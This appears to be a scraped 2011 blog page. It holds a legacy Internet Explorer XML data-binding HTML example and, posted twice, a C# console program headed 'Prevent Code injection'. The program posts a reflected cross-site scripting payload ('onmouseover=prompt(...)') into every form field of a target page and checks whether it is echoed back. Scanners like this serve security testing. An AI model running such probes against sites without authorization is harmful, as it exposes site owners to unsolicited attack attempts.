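<!--
  Internet Explorer XML data island: the XML element loads file.xml and the
  TABLE is bound to it through DATASRC; each DATAFLD names a field of a record.
  This binding is a legacy IE feature and is not part of standard HTML.
  The tags are written without inner spaces ("<HTML>", not "< HTML >") so
  that a browser parses them as markup instead of showing them as text.
  NOTE(review): bound SPANs take the field value as plain text by default;
  keep it that way (no DATAFORMATAS="html") when file.xml is not fully trusted.
-->
<HTML>
<HEAD>
<TITLE>Show XML Content</TITLE>
</HEAD>
<BODY>
<XML ID="MyXMLdata" Name="xmlData" SRC="file.xml"></XML>
<TABLE ID="XMLTable" DATASRC="#MyXMLdata" BORDER="1" cellpadding="2" cellspacing="0">
<THEAD>
<TR>
<TH>column 1</TH>
<TH>Column 2</TH>
</TR>
</THEAD>
<TR>
<TD>
<B><SPAN DATAFLD="ID"></SPAN></B>
</TD>
<TD>
<SPAN DATAFLD="TRNREF"></SPAN>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>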
Monday, November 21, 2011
Wednesday, November 16, 2011
Prevent Code injection
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Text;
using System.Net;
using System.Net.Sockets;
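namespace sqlInjection
{
    /// <summary>
    /// Reflection check for a web form: downloads a page, collects the names of its
    /// input and select controls, posts one marker value to every control and reports
    /// whether the marker comes back in the response body.
    /// </summary>
    class Program
    {
        // Outbound proxy settings. When proxy or port is empty the request is sent
        // without an explicit proxy (the original called int.Parse("") and threw).
        // NOTE(review): keep real proxy credentials out of source; read them from
        // configuration or the environment instead.
        private static string proxy = "";
        private static string port = "";
        private static string user = @"";
        private static string pass = "";

        /// <summary>
        /// Finds every tag that starts with <paramref name="component"/> and appends
        /// the value of its name attribute to <paramref name="httpControls"/>.
        /// </summary>
        /// <param name="htmlContent">Markup to scan.</param>
        /// <param name="component">Tag opener to look for, e.g. "&lt;input".</param>
        /// <param name="httpControls">Receives the control names that were found.</param>
        private static void SearchComponents(string htmlContent, string component, List<string> httpControls)
        {
            if (string.IsNullOrEmpty(htmlContent) || string.IsNullOrEmpty(component) || httpControls == null)
            {
                return;
            }

            int searchFrom = 0;
            while (searchFrom < htmlContent.Length)
            {
                // ">= 0": the original tested "> 0" and skipped a tag at offset 0.
                int tagStart = htmlContent.IndexOf(component, searchFrom, StringComparison.OrdinalIgnoreCase);
                if (tagStart < 0)
                {
                    break;
                }

                // Stay inside this tag; the original searched the rest of the document
                // for "name" and could run past the end of the string.
                int tagEnd = htmlContent.IndexOf('>', tagStart);
                if (tagEnd < 0)
                {
                    tagEnd = htmlContent.Length;
                }

                string controlName = ReadNameAttribute(htmlContent, tagStart + component.Length, tagEnd);
                if (controlName.Length > 0)
                {
                    httpControls.Add(controlName);
                }

                searchFrom = tagStart + component.Length;
            }
        }

        // Returns the value of the name attribute found in html[from, to), or "" if there is none.
        private static string ReadNameAttribute(string html, int from, int to)
        {
            int cursor = from;
            while (cursor < to)
            {
                int attr = html.IndexOf("name", cursor, to - cursor, StringComparison.OrdinalIgnoreCase);
                if (attr < 0)
                {
                    return "";
                }
                cursor = attr + 4;

                // Only a standalone attribute counts, not "classname" or "data-name".
                if (attr == 0 || !char.IsWhiteSpace(html[attr - 1]))
                {
                    continue;
                }

                int p = cursor;
                while (p < to && char.IsWhiteSpace(html[p]))
                {
                    p++;
                }
                if (p >= to || html[p] != '=')
                {
                    continue;
                }
                p++;
                while (p < to && char.IsWhiteSpace(html[p]))
                {
                    p++;
                }
                if (p >= to)
                {
                    return "";
                }

                int valueStart;
                int valueEnd;
                char first = html[p];
                if (first == '"' || first == '\'')
                {
                    // Quoted value: runs to the matching quote.
                    valueStart = p + 1;
                    valueEnd = html.IndexOf(first, valueStart, to - valueStart);
                    if (valueEnd < 0)
                    {
                        valueEnd = to;
                    }
                }
                else
                {
                    // Unquoted value: runs to the next whitespace or the end of the tag.
                    valueStart = p;
                    valueEnd = p;
                    while (valueEnd < to && !char.IsWhiteSpace(html[valueEnd]))
                    {
                        valueEnd++;
                    }
                }
                return html.Substring(valueStart, valueEnd - valueStart);
            }
            return "";
        }

        // Builds a form POST request for link and attaches the proxy only when one is configured.
        private static WebRequest CreateRequest(string link)
        {
            WebRequest request = WebRequest.Create(link);
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";

            int proxyPort;
            if (!string.IsNullOrEmpty(proxy) && int.TryParse(port, out proxyPort))
            {
                WebProxy webProxy = new WebProxy(proxy, proxyPort);
                if (!string.IsNullOrEmpty(user))
                {
                    webProxy.Credentials = new NetworkCredential(user, pass);
                }
                request.Proxy = webProxy;
            }
            return request;
        }

        // Posts postData to link and returns the response body; streams are disposed even on failure.
        private static string Post(string link, string postData, bool printStatus)
        {
            byte[] byteArray = Encoding.UTF8.GetBytes(postData);
            WebRequest request = CreateRequest(link);
            request.ContentLength = byteArray.Length;

            using (Stream body = request.GetRequestStream())
            {
                body.Write(byteArray, 0, byteArray.Length);
            }

            using (WebResponse response = request.GetResponse())
            {
                HttpWebResponse httpResponse = response as HttpWebResponse;
                if (printStatus && httpResponse != null)
                {
                    Console.WriteLine(httpResponse.StatusDescription);
                }

                using (StreamReader reader = new StreamReader(response.GetResponseStream()))
                {
                    return reader.ReadToEnd();
                }
            }
        }

        /// <summary>
        /// Fetches the page at <c>link</c>, posts the marker to every named control and
        /// prints "Injection " when the marker text is present in the second response.
        /// </summary>
        static void Main(string[] args)
        {
            string link = "http://site.com";
            /*
            string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
            string injectionVerif = "prompt(";
            */
            string injection = @"%22onmouseover=prompt(963103)%3E";
            string injectionVerif = "onmouseover=prompt(";

            // First request: empty form body, only to obtain the page markup.
            string httmlContent = Post(link, "", true);

            // The listing showed "< select" / "< input" with a space after "<",
            // which never occurs in real markup; the openers are restored here.
            List<string> listHTMLComponents = new List<string>();
            listHTMLComponents.Add("<select");
            listHTMLComponents.Add("<input");

            List<string> httpControls = new List<string>();
            foreach (string searchComponent in listHTMLComponents)
            {
                SearchComponents(httmlContent, searchComponent, httpControls);
            }

            // Control names come from the page, so they are URL-encoded; the marker is
            // already percent-encoded and is sent as written.
            List<string> pairs = new List<string>();
            foreach (string control in httpControls)
            {
                pairs.Add(Uri.EscapeDataString(control) + "=" + injection);
            }
            string postData = string.Join("&", pairs.ToArray());

            httmlContent = Post(link, postData, false);

            // A match means the submitted value is echoed back. It is a finding only if
            // the leading quote was returned unencoded; a page that HTML-encodes the
            // echoed value (the fix on the application side) still contains this text.
            if (httmlContent.Contains(injectionVerif))
            {
                Console.WriteLine("Injection ");
            }
        }
    }
}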
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
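namespace sqlInjection
{
    /// <summary>
    /// Reflection check for a web form: downloads a page, collects the names of its
    /// input and select controls, posts one marker value to every control and reports
    /// whether the marker comes back in the response body.
    /// </summary>
    class Program
    {
        // Outbound proxy settings. When proxy or port is empty the request is sent
        // without an explicit proxy (the original called int.Parse("") and threw).
        // NOTE(review): keep real proxy credentials out of source; read them from
        // configuration or the environment instead.
        private static string proxy = "";
        private static string port = "";
        private static string user = @"";
        private static string pass = "";

        /// <summary>
        /// Finds every tag that starts with <paramref name="component"/> and appends
        /// the value of its name attribute to <paramref name="httpControls"/>.
        /// </summary>
        /// <param name="htmlContent">Markup to scan.</param>
        /// <param name="component">Tag opener to look for, e.g. "&lt;input".</param>
        /// <param name="httpControls">Receives the control names that were found.</param>
        private static void SearchComponents(string htmlContent, string component, List<string> httpControls)
        {
            // The listing lost the generic argument and the end of this signature
            // ("List" with nothing after it); List<string> httpControls is restored.
            if (string.IsNullOrEmpty(htmlContent) || string.IsNullOrEmpty(component) || httpControls == null)
            {
                return;
            }

            int searchFrom = 0;
            while (searchFrom < htmlContent.Length)
            {
                // ">= 0": the original tested "> 0" and skipped a tag at offset 0.
                int tagStart = htmlContent.IndexOf(component, searchFrom, StringComparison.OrdinalIgnoreCase);
                if (tagStart < 0)
                {
                    break;
                }

                // Stay inside this tag; the original searched the rest of the document
                // for "name" and could run past the end of the string.
                int tagEnd = htmlContent.IndexOf('>', tagStart);
                if (tagEnd < 0)
                {
                    tagEnd = htmlContent.Length;
                }

                string controlName = ReadNameAttribute(htmlContent, tagStart + component.Length, tagEnd);
                if (controlName.Length > 0)
                {
                    httpControls.Add(controlName);
                }

                searchFrom = tagStart + component.Length;
            }
        }

        // Returns the value of the name attribute found in html[from, to), or "" if there is none.
        private static string ReadNameAttribute(string html, int from, int to)
        {
            int cursor = from;
            while (cursor < to)
            {
                int attr = html.IndexOf("name", cursor, to - cursor, StringComparison.OrdinalIgnoreCase);
                if (attr < 0)
                {
                    return "";
                }
                cursor = attr + 4;

                // Only a standalone attribute counts, not "classname" or "data-name".
                if (attr == 0 || !char.IsWhiteSpace(html[attr - 1]))
                {
                    continue;
                }

                int p = cursor;
                while (p < to && char.IsWhiteSpace(html[p]))
                {
                    p++;
                }
                if (p >= to || html[p] != '=')
                {
                    continue;
                }
                p++;
                while (p < to && char.IsWhiteSpace(html[p]))
                {
                    p++;
                }
                if (p >= to)
                {
                    return "";
                }

                int valueStart;
                int valueEnd;
                char first = html[p];
                if (first == '"' || first == '\'')
                {
                    // Quoted value: runs to the matching quote.
                    valueStart = p + 1;
                    valueEnd = html.IndexOf(first, valueStart, to - valueStart);
                    if (valueEnd < 0)
                    {
                        valueEnd = to;
                    }
                }
                else
                {
                    // Unquoted value: runs to the next whitespace or the end of the tag.
                    valueStart = p;
                    valueEnd = p;
                    while (valueEnd < to && !char.IsWhiteSpace(html[valueEnd]))
                    {
                        valueEnd++;
                    }
                }
                return html.Substring(valueStart, valueEnd - valueStart);
            }
            return "";
        }

        // Builds a form POST request for link and attaches the proxy only when one is configured.
        private static WebRequest CreateRequest(string link)
        {
            WebRequest request = WebRequest.Create(link);
            request.Method = "POST";
            request.ContentType = "application/x-www-form-urlencoded";

            int proxyPort;
            if (!string.IsNullOrEmpty(proxy) && int.TryParse(port, out proxyPort))
            {
                WebProxy webProxy = new WebProxy(proxy, proxyPort);
                if (!string.IsNullOrEmpty(user))
                {
                    webProxy.Credentials = new NetworkCredential(user, pass);
                }
                request.Proxy = webProxy;
            }
            return request;
        }

        // Posts postData to link and returns the response body; streams are disposed even on failure.
        private static string Post(string link, string postData, bool printStatus)
        {
            byte[] byteArray = Encoding.UTF8.GetBytes(postData);
            WebRequest request = CreateRequest(link);
            request.ContentLength = byteArray.Length;

            using (Stream body = request.GetRequestStream())
            {
                body.Write(byteArray, 0, byteArray.Length);
            }

            using (WebResponse response = request.GetResponse())
            {
                HttpWebResponse httpResponse = response as HttpWebResponse;
                if (printStatus && httpResponse != null)
                {
                    Console.WriteLine(httpResponse.StatusDescription);
                }

                using (StreamReader reader = new StreamReader(response.GetResponseStream()))
                {
                    return reader.ReadToEnd();
                }
            }
        }

        /// <summary>
        /// Fetches the page at <c>link</c>, posts the marker to every named control and
        /// prints "Injection " when the marker text is present in the second response.
        /// </summary>
        static void Main(string[] args)
        {
            string link = "http://site.com";
            /*
            string injection = "1%3cScRiPt%20%3eprompt%28944524%29%3c%2fScRiPt%3e";
            string injectionVerif = "prompt(";
            */
            string injection = @"%22onmouseover=prompt(963103)%3E";
            string injectionVerif = "onmouseover=prompt(";

            // First request: empty form body, only to obtain the page markup.
            string httmlContent = Post(link, "", true);

            // The listing showed "< select" / "< input" with a space after "<",
            // which never occurs in real markup; the openers are restored here.
            List<string> listHTMLComponents = new List<string>();
            listHTMLComponents.Add("<select");
            listHTMLComponents.Add("<input");

            List<string> httpControls = new List<string>();
            foreach (string searchComponent in listHTMLComponents)
            {
                SearchComponents(httmlContent, searchComponent, httpControls);
            }

            // Control names come from the page, so they are URL-encoded; the marker is
            // already percent-encoded and is sent as written.
            List<string> pairs = new List<string>();
            foreach (string control in httpControls)
            {
                pairs.Add(Uri.EscapeDataString(control) + "=" + injection);
            }
            string postData = string.Join("&", pairs.ToArray());

            httmlContent = Post(link, postData, false);

            // A match means the submitted value is echoed back. It is a finding only if
            // the leading quote was returned unencoded; a page that HTML-encodes the
            // echoed value (the fix on the application side) still contains this text.
            if (httmlContent.Contains(injectionVerif))
            {
                Console.WriteLine("Injection ");
            }
        }
    }
}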